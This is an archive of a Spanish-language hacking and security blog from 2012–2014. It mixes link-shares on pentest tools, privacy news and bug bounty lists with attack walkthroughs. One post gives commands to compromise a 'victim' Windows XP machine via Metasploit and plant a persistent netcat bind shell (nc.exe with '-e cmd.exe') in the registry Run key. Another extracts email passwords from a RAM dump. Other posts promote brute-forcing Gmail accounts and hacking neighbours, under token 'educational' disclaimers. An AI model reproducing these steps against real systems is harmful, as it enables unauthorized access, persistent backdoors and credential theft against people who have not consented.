Vistas de página en total

miércoles, 12 de marzo de 2014

11 REGLAS PARA LA VIDA SGUN BILL GATES

Bill Gates volvió recientemente a su antiguo instituto a dar un discurso a los alumnos, y entre todas las cosas que les dijo recalcó 11 reglas de vida para que tuvieran en cuenta los chicos:

Regla Uno - La vida no es justa, acostúmbrate a ello.

Regla Dos - Al mundo no le importará tu autoestima. El mundo esperará que logres algo, independientemente de que te sientas bien o no contigo mismo.

Regla Tres - No ganarás US$5.000 mensuales justo después de haber salido de la escuela, y no serás el vicepresidente de una empresa, con coche gratis, hasta que hayas terminado el instituto, estudiado y trabajado mucho.

Regla Cuatro - Si piensas que tu profesor es duro, espera a que tengas un jefe. Ese sí que no tendrá vocación de enseñanza ni la paciencia requerida.

Regla Cinco - Dedicarse a voltear hamburguesas no te quita dignidad. Tus abuelos tenían una palabra diferente para describirlo: le llamaban oportunidad.

Regla Seis - Si metes la pata, no es culpa de tus padres, así que no lloriquees por tus errores; aprende de ellos.

Regla Siete - Antes de que nacieras, tus padres no eran tan aburridos como lo son ahora. Ellos empezaron a serlo por pagar tus cuentas, lavar tu ropa sucia y escucharte hablar acerca de lo “super” que eres y lo pesados que son ellos. Así que antes de emprender tu lucha por las selvas vírgenes, contaminadas por la generación de tus padres, inicia el camino limpiando las cosas de tu propia vida, empezando por tu habitación, escritorio, armario y closet.

Regla Ocho - En la escuela puede haberse eliminado la diferencia entre ganadores y perdedores, pero en la vida real no. En algunas escuelas ya no se pierden años lectivos y te dan las oportunidades que necesitas para encontrar la respuesta correcta en tus exámenes y para que tus tareas sean cada vez más fáciles. Eso no tiene ninguna semejanza con la vida real.

Regla Nueve - La vida no se divide en semestres. No tendrás vacaciones de verano largas en lugares lejanos y muy pocos jefes se interesarán en ayudarte a que te encuentres a ti mismo. Todo esto tendrás que hacerlo en tu tiempo libre.

Regla Diez - La televisión no es la vida real. En la vida cotidiana, la gente de verdad tiene que salir del café de la película para irse a trabajar.
Regla Once - Sé amable con los "NERDS" (los más aplicados de tu clase). Existen muchas probabilidades de que termines trabajando para uno de ellos.


TOMADO DE  http://www.taringa.net/Erick-F/mi/bMmtf

jueves, 15 de agosto de 2013

.........Y LE DAMOS LA BIENVENIDA AL ARDUINO

es interesante aprovechar todas estas posibilidades y ventajas que nos ofrece la tecnología, ahora podemos disfrutar del ARDUINO, el símil del software pero en la parte del hardware, programable para casi cualquier medio electrónico.



puedes ir directamente al proyecto ARDUINO dando click AQUI, y si quieres ver el vídeo documental sobre ARDUINO, solo debes dar click AQUI

8 HERRAMIENTAS PARA PROTEGER TU PRIVACIDAD EN INTERNET

después de ver y leer que hasta los mas grandes, y que anteriormente aparentaban darnos privacidad, decidieron manifestarse ante los medios y de forma publica, aceptando que nuestra información no es tan privada, ya que tiene aplicaciones encargadas de manipular nuestros correos insertandole publicidad, es algo así como que "el cartero abriera tus cartas antes de entregártelas y le pusiera adentro volantes publicitarios", estos grandes del correo, se curan en salud diciendo que esto no tiene intervención "humana".........aquí lo malo, es que ya el correo fue manipulado y recibimos una cantidad de publicidad que no nos interesa.........o quien nos garantiza que esta publicidad insertada por el proveedor no es maliciosa??

Por esta razon quiero compartir con ustedes este link, en el que pueden encontrar herramientas open source para contrarestar un poco este flagelo.

las herramientas pueden verlas AQUI

tomado de: http://www.pillateunlinux.com

COMFIRMADO POR GOOGLE: NO ESPERES PRIVACIDAD POR PARTE DE GMAIL

Cuando usamos Gmail, aceptamos que vamos a ver publicidad relacionada con el contenido de nuestros correos. Es un detalle no falto de polémica y que ha sido usado tanto por la competencia como por partidarios de la privacidad en Internet para recomendar no usarlo.


“Al igual que el remitente de una carta no debe sorprenderse si el asistente del destinatario la abre, la gente que usa correo electrónico basado en web no puede sorprenderse si sus correos son procesados por [el proveedor de correo] del destinatario en el momento de la entrega. En efecto, ‘una persona no tiene expectativas de privacidad en la información que, de manera voluntaria, ofrece a terceras partes’”.

Pocas veces podemos ver a una compañía decir de manera tan clara lo que piensa. Ese tipo de palabras no las veremos nunca en el blog oficial de la compañía, ni serán leídas nunca en voz alta por Larry Page, pero es la piedra sobre la que se levanta todo el servicio de Gmail: que no nos podemos esperar nada de privacidad en nuestro correo electrónico desde el mismo momento en el que usamos Gmail.

Dichas palabras salen de la defensa de Google ante un juicio por recolectar información de los usuarios, y, por supuesto, las organizaciones en defensa de la privacidad no han tardado en poner el grito en el cielo, y de manera acertada han señalado que el símil entre el correo convencional y el correo electrónico no es el adecuado: es como si el cartero abriese nuestra correspondencia y metiese hojas de publicidad dependiendo de lo que leyese.

También es cierto que Google lleva desde el principio esgrimiendo la misma defensa: todo el proceso de lectura de correos está automatizado, y ningún humano puede leer nuestro correo. Claro que, desde que esta justificación apareció por vez primera, hemos visto muchas revelaciones que indican lo contrario, como el programa PRISM que permitiría al gobierno de los EEUU acceder directamente a los correos guardados en servidores de Google y otras compañías.

En todo caso, toda esta polémica no sirve de mucho, ya que si hay algo que nos debería quedar claro desde el principio es que no podemos esperar ningún tipo de privacidad usando productos de Google. ¿Es eso algo tan malo como para dejar de usar sus servicios? Para mucha gente sí, pero la verdad es que para la mayoría (entre la que me encuentro), aparentemente, no.

CONFIGURACIÓN E IMPLEMENTACION DE SERVIDOR WDS

WDS
Windows Deployment Services es una herramienta de Microsoft diseñada especialmente para Windows Server. Es el sucesor de Remote Installation Services. WDS está destinado a ser utilizado para el despliegue de forma remota en Windows Vista, Windows 7 y Windows Server 2008, pero también es compatible con otros sistemas operativos porque a diferencia de su predecesor RIS, que era un método para la automatización de la proceso de instalación, WDS utiliza en particular el Windows Imaging Format (WIM). WDS se incluye como una función de servidor en todas las versiones de 32 bits y 64 bits de Windows Server 2008, y se incluye como un componente instalable opcionalmente con Service Pack 2 de Windows Server 2003.
En esta publicacion se aloja un archivo PDF el cual contiene la informacion necesaria para la implementacion y administracion del WDS.
INFORMACION Y DOCUMENTACION: AQUI

miércoles, 3 de abril de 2013

KALI LINUX

















De los mismos creadores de BACKTRACK, se puede descaragar desde AQUI

miércoles, 13 de febrero de 2013

ATAQUE DE FUERZA BRUTA A CUENTAS DE GMAIL USANDO HYDRA EN BT 5 R3

en este video tutorial se muestra como hacer un ataque de fuerza bruta a cuentas de gmail, es muy completo, pueden verlo AQUI


sábado, 2 de febrero de 2013

Cómo localizar usuarios de twitter y flickr a través de sus fotos

me encontré con este articulo en DRAGONJAR, y me pareció tremendamente interesante, una vez mas podemos ver que no tenemos nada seguro en las redes sociales, la Internet es como  un "dia de quincena a las 3 de la mañana en plena calle de ladrones"

lean el articulo completo AQUI

martes, 22 de enero de 2013

NUEVOS MODULOS DE JAVA EN MSF (METASPLOIT FRAMEWORK)

en el siguiente link podran encontrar nuevos modulos de java para METASPLOIT FRAMEWORK, solo deben dar click aqui

lunes, 21 de enero de 2013

Video Tutorial SET (Social Engineering Toolkit)

La ingeniería social es una de las puertas de acceso mas utilizadas por los delincuentes, para robar tu información personal o infiltrarse en una empresa. Por este motivo cada pentest que realicemos a una organización, siempre debe incluirse técnicas de , para ver que tan vulnerable es la empresa a este tipo de ataques y tomar las medidas correspondientes.


SET (Social Engineering Toolkit) es un kit de herramientas que nos ayudara en la tarea de realizar ataques de ingeniería social, nos permite suplantar fácilmente la identidad de un sitio determinado, o enviar ataques por mail a las cuentas de correo de la compañía, infectar memorias usb o cds/dvds infectados, todo esto perfectamente integrado con el grandioso Metasploit Framework.
A continuación, les dejo una serie de vídeo tutoriales para aprender a utilizar correctamente este kit de herramientas, espero que lo disfruten:

CAINE – Distribución Live CD para Análisis Forense


CAINE (Computer Aided INvestigative Environment), es una distribución Live CD para realizar análisis forense informático, de la que hemos hablado en varios ocasiones en nuestra comunidad, creada por Giancarlo Giustini es una de las mejores opciones que tenemos a la mano cuando deseamos realizar un análisis  de algún equipo informático.


CAINE se diferencia de las demás distribuciones de su tipo (Forensic Boot CDHelixDeft, etc..) por su facilidad de uso y que proporcionar una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las pruebas electrónicas, y ofrece un proceso semi-automático durante la documentación y  generación de informes.
Giancarlo me ha enviado un mail para notificarme de la nueva versión de esta excelente distribución y aprovecho para agradecerle por dejarme aportar mi granito de arena en el CAINE, realizando la traducción de los reportes en español.
CAINE también cuenta con un subproyecto llamado NBCAINE y mantenido por Nanni Bassetti, que permite utilizar esta excelente distribución desde una memoria USB, con la finalidad de ser convertir un netbook en una completa  de análisis forense  o poder guardar los cambios realizados en el sistema.
Lo puedes descargar y ver el articulo completo aqui

sábado, 19 de enero de 2013

Katana – Múltiples Distribuciones de Seguridad en tu USB

Memoria USB Booteable con Varias Distribuciones de Seguridad Informática, la pueden descargar desde aqui

SEÑORES, LO QUE TODOS ESTABAMOS ESPERANDO, NUEVAMENTE ESTA CON NOSOTROS MEGAUPLOAD

hoy 19 de enero de 2013, hace un año el FBI cerro MEGAUPLOAD,ahora nuevamente esta abierto para nosotros, cu nuevo nombre es MEGA, y aqui les dejo el link para que lo visiten https://mega.co.nz/

viernes, 18 de enero de 2013

ANALISIS DE UN ATAQUE DDoS

El siguiente es un articulo bien interesante tomade de la revista pentestmagazine, en este articulo veras como funciona un ataque DDoS, para ver el articulo solo debes dar click aqui.

tomado de www.dragonjar.org

Reputación Online

En el siguiente link, podras ver si eres una estrella de la internet o si sigues siendo ese del comun, solo da clikck aqui.

tomado de www.dragonjar.org

miércoles, 16 de enero de 2013

Grave 0day en Java permite Ejecución de Código Remoto (Video MSF)

Recientemente (PoC proporcionado el 10/01/2013) se ha detectado un (muy) grave 0day en Oracle Java SE 7 Update 10, que es la última versión disponible de Java. Lo que lo hace muy peligroso para todos los usuarios de Windows, Linux y Mac, ya que no existe parche alguno que arregle esta vulnerabilidad.
 
El alcance de esta vulnerabilidad es crítica ya que la mayoría (por no decir todos) de los computadores tienen instalado Java por los beneficios que nos proporciona. Lo que lo transforma en un 0day muy peligroso y muy codiciado por los potenciales atacantes, es más, en estos momentos ya se está usando para fines malicioso, por lo demás, pronto será parchado y si quieren sacarle provecho más vale que lo hagan pronto.
 
La solución óptima en estos momentos es desactivar Java hasta que Oracle proporcione una actualización con el correspondiente parche que arregle este 0day.
 
Como siempre Metasploit ha hecho su trabajo y ya se dispone de un módulo que lo explota, así que aquí les dejo con un video de explotación con Metasploit:
 
VER VIDEO AQUI
 
TOMADO DE
 
 

miércoles, 9 de enero de 2013

martes, 8 de enero de 2013

CRACKEAR WPA Y WPA2 CON GERIX

en el siguiente link encontraran un video-tutorial, en el cual se muestra como crackear contraseñas WPA y WPA2 con GERIN, solo den click en el enlace:

http://www.youtube.com/watch?v=X-vkHcUKChI&feature=player_embedded

jueves, 3 de enero de 2013

LIBRO NEGRO DEL HACKER

lo pueden descargar AQUI

HACKING Y HACKERS LIBROS

descargualos desde AQUI

HACKERS: LOS PIRATAS DEL CHIP Y LA INTERNET

pueden descargar el PDF desde AQUI

DESCARGA EL LIBRO DE HACKING ETICO DE CARLOS TORI

el libro lo puedes descargar AQUI

EXAMINA TUS PDF´S Y DOC´S EN BUSCA DE MALWARE

ahora puedes analizar tus documentos y pdf´s en busca de malware, solo necesitas entrar aqui y subir el archivo que quieres analizar.

CONTRASEÑAS SEGURAS ONLINE

encontre este sitio y me parecio importante compartirlo con uds para que tengan en cuenta las propiedades que debe llevar o tener una contraseña a la hora de ser creada, entonces en el siguiente link podran acceder a la pagina que les ayudara a crear contraseñas seguras, solo creara la contraseña sin necesidad de datos adicionales, como lo es, el correo electronico ni nada por el estilo.

espero les sea de gran ayuda, solo da un clikc AQUI

EXPLOIT DB

visiten exploit db, uno de los sitios mas grandes y completos en cuestion de esploits, accedan dando click aqui

BLOG´S DE INTERES Y CON BUEN ATERIAL

http://calebbucker.blogspot.com/
http://maztor.blogspot.com/
http://foro.cl-security.net/index.php
http://www.blackploit.com/
http://www.hackplayers.com/
http://www.seguridadjabali.com/
http://www.arthusu.blogspot.mx/
http://zentrixplus.net/forum/
http://www.antrax-labs.org/
http://bucio.com.mx/
http://www.hack4life.us/
http://underc0de.org/
http://blog.hbautista.com/
http://byte-inside.blogspot.com/
http://n3t-datagrams.net/
http://snakingmax.blogspot.com/
http://www.redinfocol.org/
http://sub-soul.blogspot.com/
http://www.seguridadblanca.com/
http://wow.sinfocol.org/
http://troyanosyvirus.com.ar/
http://spamloco.net/
http://www.m4ku4z.net/bl0g/
http://blog.zerial.org/

"HOW TO" DE BACKTRACK LINUX

en el siguiente link se encuentran varios HOW TO de BACKTRACK, directamente desde el sitio, accede dando click aqui, son completos y aplicables.

Vulnerabilidades, redes sociales y dispositivos móviles, objetivos de los ciberdelincuentes en 2013

Las vulnerabilidades serán el objetivo principal de los ciberdelincuentes en el nuevo año. Así lo refleja un listado elaborado por PandaLabs, el laboratorio de malware de Panda Security, con las tendencias de seguridad que primarán en 2013. Así las cosas, según indica Luis Corrons, director técnico de PandaLabs: “Se trata, sin duda, del método de infección predilecto para lograr comprometer sistemas de forma transparente, utilizado tanto por ciberdelincuentes como por agencias de inteligencia de países.”
 
En 2012 se ha observado que Java, que está instalado en cientos de millones de dispositivos, ha sido comprometido recurrentemente y utilizado de forma activa para infectar a millones de usuarios. En segundo lugar se encuentra Adobe, ya que dada la popularidad de sus aplicaciones (Acrobat Reader, Flash, etc.) y sus múltiples agujeros de seguridad, es una de las herramientas preferidas para infectar de manera masiva a usuarios y/o para realizar ataques dirigidos.
 
“Si bien podemos pensar que quienes corren un mayor riesgo son los usuarios domésticos, hay que recordar que la actualización de aplicaciones, algo primordial para protegerse ante este tipo de ataques, es un proceso muy complejo en empresas, donde hay que coordinar la actualización de todos los equipos”, comenta el directivo, que añade: “Además, al mismo tiempo hay que asegurarse de que todas las aplicaciones que se utilizan en la empresa deben funcionar correctamente. Esto hace que los procesos de actualización sean lentos, lo que abre una ventana de tiempo que es explotada tanto para robar información en general, como para realizar ataques dirigidos en busca de información confidencial.”
 
Otros ámbitos de los que se hablará mucho el próximo 2013 en cuestiones de seguridad son:
 
Redes sociales
La segunda técnica más utilizada es la ingeniería social. Engañar al usuario para que sea éste el que colabore para infectar su equipo y robarle información es una tarea sencilla, ya que no existen aplicaciones de seguridad que protejan al usuario de sí mismo. En este contexto, el empleo de redes sociales, lugares donde cientos de millones de individuos intercambian información, en muchas ocasiones de índole personal, hace que sea el coto de caza preferido para engañar a los navegantes. Igualmente, habrá que prestar atención especial a Skype, que al sustituir a Messenger puede convertirse en un objetivo para los ciberdelincuentes.
 
Malware para dispositivos móviles
Android se ha convertido en el sistema operativo dominante en dispositivos móviles. Google anunció en septiembre de 2012 que habían alcanzado la escalofriante cifra de 700 millones de activaciones de Android. Si bien principalmente es utilizado en smartphones y tablets, su versatilidad y el hecho de no tener que pagar licencia para su uso va a hacer que nuevos tipos de dispositivos se sumen al uso de este sistema operativo. Cada vez va a ser más extendido su uso, desde televisores a todo tipo de electrodomésticos, lo que abre todo un mundo aún desconocido de posibles ataques.
 
Ciberguerra / Ciberespionaje
A lo largo de 2012 se han dado diferentes tipos de ataques contra naciones. Cabe mencionar Oriente Medio, donde el conflicto también está presente en el ciberespacio. De hecho muchos de estos ataques ya ni siquiera son llevados a cabo por gobiernos de sus diferentes países, sino por ciudadanos que consideran que deben defender a su nación atacando a los vecinos utilizando todos los medios a su alcance. Además, los diferentes gobiernos de las principales naciones del mundo están creando cibercomandos para prepararse tanto en la defensa como en el ataque, por lo que la “carrera ciberarmamentística” irá a más.
 
Crecimiento de malware
Desde hace dos décadas, la cantidad de malware viene creciendo de forma exponencial. Se trata de cifras estratosféricas, con decenas de miles de nuevos ejemplares apareciendo cada día, por lo que este crecimiento continuado parece que está muy lejos de llegar a su fin. A pesar de que las fuerzas del orden de los diferentes países cada vez están mejor preparadas para luchar contra este tipo de delincuencia, se encuentran aún lastradas por la carencia de fronteras en Internet. Cada cuerpo de policía de una nación puede actuar en su territorio, mientras que un sólo ciberdelincuente puede lanzar un ataque desde un país A, robar datos a ciudadanos de un país B, mandar los datos robados a un servidor ubicado en el país C y él estar viviendo en el país D. Esto se puede hacer con unos pocos clics, mientras que la acción coordinada de fuerzas del orden de varios países es una tarea que, como poco, puede llevar meses. Es por ello que los ciberdelincuentes están viviendo su particular edad de oro.
 
Malware para Mac
Casos como el de Flashback, ocurrido en 2012, han demostrado no sólo que Mac no es inmune a ataques de malware, sino que se dan también infecciones masivas afectando a cientos de miles de usuarios. Si bien el número de programas maliciosos para Mac sigue siendo bajo comparado con el creado para PC, esperamos que siga aumentando. El hecho de tener cada vez un mayor número de usuarios, sumado a los agujeros de seguridad y a la falta de concienciación de los consumidores (por un exceso de confianza), hace que el atractivo hacia esta plataforma siga en ascenso durante el próximo año.
 
Windows 8

El último sistema operativo de Microsoft, como todos sus predecesores, también sufrirá ataques. Los ciberdelincuentes no se van a centrar sólo en él, pero se asegurarán de que sus creaciones funcionen igual de bien desde Windows XP a Windows 8, pasando por Windows 7. Y es que, uno de los atractivos de la nueva criatura de la factoría de Redmond es que puede ser utilizado tanto en PC como en tablets o smartphones. Es por ello que si se consiguen desarrollar ejemplares de malware funcionales que permitan robar información en cualquiera que sea el dispositivo utilizado, podríamos ver un desarrollo específico de software malintencionado para Windows 8 que podría llevar las ofensivas un paso más allá.
 

NUEVO WEB USER INTERFACE PARA PENTESTING

en el siguiente enlace podran encontrar informacion sobre una nueva interfaz web para pentesting, den click aqui y podran acceder a la info.

tomado de www.dragonjar.org

miércoles, 2 de enero de 2013

Espiando a nuestros Vecinos y Hackeandole el Sistema mediante Subterfuge

UTILIZANDO SUBTERFUGE PARA HACER HACKING A LOS VECINOS, ESTE TUTO ES SOLO CON FINES EDUCATIVOS, LO TOME DE CALEBBUCKER.BLOGSPOT.COM, DANDO CLICK AQUI LO PODRAS VER

TUTORIALES DE BACKTRACK 5

LOS TUTOS DE BACKTRACK 5 LOS PUEDEN ENCONTRAR AQUI, SON DE UTILIDAD, PRACTIQUEN.........

Crypt4you – Aprende criptografía y seguridad informática de otra forma y GRATIS

http://www.dragonjar.org/crypt4you-aprende-criptografia-y-seguridad-informatica-de-otra-forma-y-gratis.xhtml

Defacement como herramienta de publicidad a nivel gubernamental

ESTA NOTA FUE TOMADA DE DRAGONJAR.ORG Y PUEDEN VERLA COMPLETA AQUI

PENTEST MAGAZINE: Metasploit Framework Guide for PenTesters

REVISTA DE PENTEST, PUEDEN DESCARGARLA DESDE AQUI, ESTA NOTA FUE TOMADA DESDE CALEBBUCKER.BLOGSPOT.COM.

lunes, 31 de diciembre de 2012

VOLCADO DE MEMORIA RAM PARA EXTRACCION DE CONTRASEÑAS DE HOTMAIL, YAHOO Y GMAIL

lo primero que debemos hacer es descargar las aplicaciones para dicho fin, para descargar DUMPIT, lo haremos desde aqui y para descargar el WinHex lo haremos desde aqui.

despues de haberlos decargado, los copiaremos en el escritorio y los extraeremos, ya que vienen compilados en un .rar.

despues de haberlos extraido entraremos en la carpeta de DUMPIT, ahi encontraremos en archivo .exe

este archivo lo copiaremos en el escritorio y posteriormente lo ejecutaremos.
cuando lo ejecutemos nos mostrara un cuadro como este.



aqui daremos "si" que lo denotaremos con la letra"y", luego daremos enter.
cuando le demos enter nos aparecera algo asi.
como podemos ver, esta consola esta procesando la información que encontró en la memoria, para luego entregárnosla en un archivo. raw.

en el escritorio se creara un archivo como este, con el nombre de su equipo.
este archivo será el que analizaremos con el WinHex.

para examinar el archivo con el WinHex, vamos a la carpeta WinHex, y ejecutamos el aplicativo.
cuando lo ejecutamos nos aparecerá la interfaz de WinHex.
esta es la parte superior de la interfaz del WinHex, como podemos ver hay menú completo con múltiples opciones, para este caso usaremos solo 3.

la primera opción a usar es la de la pestaña FILE, daremos click en ella y luego en OPEN, cuando le demos click en OPEN nos abrirá un subcuadro en el que buscaremos la ruta en la cual quedo el archivo generado por el DUMPIT, cuando tengamos ubicado el archivo, lo seleccionaremos y le daremos click en abrir, cuando el archivo se encuentre cargado en el DUMPIT, vamos a la pestaña VIEW, ahi seleccionaremos la casilla de TEXT DISPLAY ONLY, luego daremos click en SEARCH y nos paracera algo asi.
en la parte de arriba colocaremos la palabra que deseamos buscar, en este caso buscaremos la palabra Passwd, dejamos las casillas por default y damos click en OK, después de darle click en OK, WinHex comenzara a cargar una barra, lo cual nos indica que esta realizando la búsqueda de la palabra en el archivo.
cuando complete la búsqueda, empezaremos a ver cada uno de los resultados.
en este caso me loguee en GMAIL.
después de completar la búsqueda, nos mostrara el numero de aciertos.
los aciertos nos aparecerán en una lista así.
podemos empezar a ver uno por uno, y cuando nos aparezca algo como el cuadro que sigue, ahí estará la contraseña.






















viernes, 21 de diciembre de 2012

PROTEGE TUS CONTRASEÑAS

si quieres saber mas sobre como proteger tus contraseñas visita el siguiente link haciendo click AQUI

Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria

EL SIGUIENTE LINK , TOMADO DE BLACKPLOIT.COM SOLO CON FINES EDUCATIVOS.
http://www.blackploit.com/2012/12/obtener-contrasenas-de-hotmail-yahoo.html

PARA VER EL VIDEO DAR CLICK AQUI

jueves, 13 de diciembre de 2012

BACKDORIZANDO XP DESDE BACKTRACK CON MSF

lo primero que necesitamos saber es la IP de la victima, después de saber la IP, nos vamos a BACKTRACK y haremos un escaneo con nmap, haremos un escaneo silencioso que nos diga cual sistema operativo corre la victima, entonces, el escaneo lo haremos así:

nmap -sS -O (IP de la victima)

como podemos ver en la imagen, la IP de la victima (xp) es 192.168.1.5
el paso a seguir es copiar en el escritorio de BACKTRACK, el archivo que nos creara la puerta trasera (BACKDOOR), el archivo se llama nc.exe (nc es la abreviatura de netcat). 
ahora si, procederemos con nuesttro escaneo.
el escaneo informa, sobre los puertos abiertos en la victima y el sistema operativo que esta corriendo.
ahora ejecutaremos METASPLOIT en una terminal, digitando el comando #msfconsole, para poder cargar el exploit que usaremos.
teniendo ya seleccionado nuestro exploit, pasaremos a configurar un PAYLOAD con su debida configuración:

1. LHOST (ip local)
2. RHOST (ip remota)
3. exploit (lanzarlo)
después de haber lanzado el exploit, vemos que METERPRETER nos muestra una sesión abierta en la victima.
ahora, mediante METERPRETER subiremos el archivo nc.exe, que tenemos copiado en el escritorio de BACKTRACK a la carpeta system32 de la victima.
ahora iremos a los registros de WINDOWS para ver que esta ejecutando actualmente.
esto lo haremos digitando la siguiente linea de comandos.

>reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN 
ahora vamos a alterar los valores de los registros de WINDOWS en H_KEY_LOCAL_MACHINE (HKLM), y esto lo haremos con el siguiente comando.

>reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c: \\WINDOWS\\system32\\nc.exe "-L -d -p (puerto) -e cmd.exe".
ahora correremos nuevamente el comando:
 reg enumkey -kkHKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
para verificar que el BACKDOOR si quedo en los registros de HKLM.
efectivamente, el BACKDOOR está en los registros, ahora lo que haremos será reiniciar la maquina de la victima (xp), lo cual haremos con el comando >reboot.
vemos que esta reiniciando la maquina de la victima.
ahora solo queda abrir una terminal en BACKTRACK y digitar el siguiente comando.

#nc (IP de la victima) (puerto)
#nc 192.168.1.5 1111

con esto ya estamos dentro cada vez que la victima inicie sesión!!!!!























miércoles, 12 de diciembre de 2012

Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)

SOLO CON LA FIRME INTENSIÓN DE DIFUNDIR INFORMACION, HE TOMADO LA INFO DEL BLOG DE http://calebbucker.blogspot.com


Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: GoogleFacebookMozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas. 

Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.



BUG BOUNTY VULNERABILIDADES EN APLICACIONES WEB:

Mozilla

Google

Facebook

Paypal

Etsy

Wordpress

Commonsware

CCBill

Vark

Windthorstisd

BUG BOUNTY VULNERABILIDADES EN PRODUCTOS:




HALL OF FAME (SALON DE LA FAMA):


Microsoft

Apple

Adobe

IBM

Twitter

Dropbox

Cisco

Moodle
  • http://moodle.org/security

Drupal

Oracle

Symantec

Ebay

Twilio

37 Signals

Salesforce

Reddit

Github

Ifixit

Constant Contact

Zeggio

Simplify

Team Unify

Skoodat

Relaso

Moduscsr

Cloudnetz

Emptrust

Apriva

Amazon

SqaureUp

G-Sec

Xen

Engine Yard

Lastpass

RedHat

Acquia

Mahara

Zynga

Risk.io

Opera 

Owncloud

Scorpion Soft

Norada 

Cpaperless 

Wizehive 

Tuenti

Nokia Siemens

Sound Cloud

Puppetlabs

Neohapsis

HTC
Estas son las empresas que nos pueden considerar un pago por reportarles los fallos de seguridad que se encuentran en sus sitios webs y productos.

Les mostrare una vulnerabilidad (XSS) que encontre en Google Play la cual fue respectivamente reportada y aceptada.